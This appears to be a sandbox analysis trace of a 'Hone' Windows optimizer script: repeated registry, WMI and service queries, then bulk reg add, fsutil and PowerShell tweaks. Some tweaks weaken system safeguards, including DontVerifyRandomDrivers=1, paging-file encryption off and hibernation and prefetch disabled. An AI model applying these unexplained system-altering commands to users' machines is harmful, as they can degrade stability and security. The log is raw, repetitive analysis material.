C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:1776
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:1616
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:4412
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:4492
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1764
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:1088
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2684
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:4188
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4380
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:672
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4104
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:4736
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:1220
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:3560
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:3864
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:4540
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:4876
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:2364
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:3792
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:2052
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:4416
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:2592
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:1076
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:4592
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:4568
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:4000
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:924
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:1676
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:2976
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:2084
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:2264
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:3836
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:2376
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:2560
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:976
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:4808
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:4988
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:1176
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:1976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:1896
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:4560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4384
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:5004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4596
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:2528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3708
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:2620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4792
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:1984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4308
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:2148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1820
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:1384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1144
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:2972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:548
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:4624
-
-
C:\Windows\System32\choice.exeC:\Windows\System32\choice.exe /c:12X /n /m " >:"6⤵PID:4932
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f6⤵PID:3988
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:3016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:3900
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:3796
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:4432
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:2980
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1816
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:2640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:544
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:1092
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3636
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3656
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3196
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:4228
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:3984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:224
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:2140
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:2456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:2296
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:3040
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:1108
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:3776
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:560
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:3544
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:460
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:3516
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4700
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:4708
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4092
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:2492
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:3632
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:2656
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:2156
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:1136
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:4412
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:2388
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:3772
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:844
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:4028
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:3660
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:2304
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:2800
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:3004
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:3080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:4360
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:3728
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:2292
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:2548
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:1716
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:4876
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:4448
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:4752
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:3832
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:4416
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:4048
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:1076
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:1112
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:4568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:2132
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:456
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:4892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3332
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:2608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4904
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:2012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3100
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:1720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2096
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:3180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1176
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:1536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4644
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3392
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:1748
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Hone" /v "MemoryTweaks" /f6⤵PID:2936
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\FTH" /v "Enabled" /t Reg_DWORD /d "0" /f6⤵PID:4276
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\DWM" /v "Composition" /t REG_DWORD /d "0" /f6⤵PID:4584
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t Reg_DWORD /d "1" /f6⤵PID:548
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsRunInBackground" /t Reg_DWORD /d "2" /f6⤵PID:3500
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t Reg_DWORD /d "0" /f6⤵PID:2088
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t Reg_DWORD /d "1" /f6⤵PID:3020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -Command "Disable-MMAgent -PagingCombining -mc"6⤵
- Command and Scripting Interpreter: PowerShell
PID:3156
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePageCombining" /t REG_DWORD /d "1" /f6⤵PID:3688
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "LargeSystemCache" /t Reg_DWORD /d "1" /f6⤵PID:4868
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\Session Manager" /v "HeapDeCommitFreeBlockThreshold" /t REG_DWORD /d "262144" /f6⤵PID:3388
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d "1" /f6⤵PID:3636
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "DontVerifyRandomDrivers" /t REG_DWORD /d "1" /f6⤵PID:3668
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "0" /f6⤵PID:2584
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t Reg_DWORD /d "0" /f6⤵PID:984
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t Reg_DWORD /d "0" /f6⤵PID:2700
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f6⤵PID:2336
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabledDefault" /t REG_DWORD /d "0" /f6⤵PID:3984
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f6⤵PID:2952
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t Reg_SZ /d "1000" /f6⤵PID:2140
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t Reg_SZ /d "1000" /f6⤵PID:2224
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t Reg_SZ /d "1000" /f6⤵PID:576
-
-
C:\Windows\system32\fsutil.exefsutil behavior set memoryusage 26⤵PID:3248
-
-
C:\Windows\system32\fsutil.exefsutil behavior set mftzone 26⤵PID:1228
-
-
C:\Windows\system32\fsutil.exefsutil behavior set disablelastaccess 16⤵PID:1920
-
-
C:\Windows\system32\fsutil.exefsutil behavior set encryptpagingfile 06⤵PID:1440
-
-
C:\Windows\system32\fsutil.exefsutil behavior set disable8dot3 16⤵PID:1644
-
-
C:\Windows\system32\fsutil.exefsutil behavior set disablecompression 16⤵PID:3524
-
-
C:\Windows\system32\fsutil.exefsutil behavior set disabledeletenotify 06⤵PID:1544
-
-
C:\Windows\system32\cmd.execmd /V:ON /C @echo off6⤵PID:1432
-
-
C:\Windows\system32\mode.comMode 65,166⤵PID:4700
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:2656
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:5060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:2164
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:4020
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:4452
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:4376
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4028
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:4380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:672
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:1936
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3004
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:1164
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2836
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:3412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:824
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:2228
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:1396
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:2592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:520
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:3440
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:1076
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:3344
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4796
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:4568
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:972
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:1200
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:1572
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:4852
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4444
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:3332
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:3920
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:4904
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:848
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:4988
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:1324
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:2096
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:3724
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:1176
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:2488
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:4644
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:1376
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:3392
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:2956
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:2716
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:1152
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:2380
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:940
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:1368
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:3756
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:3000
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:944
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:4844
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:2936
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:1844
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:4472
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:548
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:5080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:3020
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:3900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3640
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:3840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1828
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:1372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1132
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:4348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1740
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:3244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4676
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3380
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2984
-
-
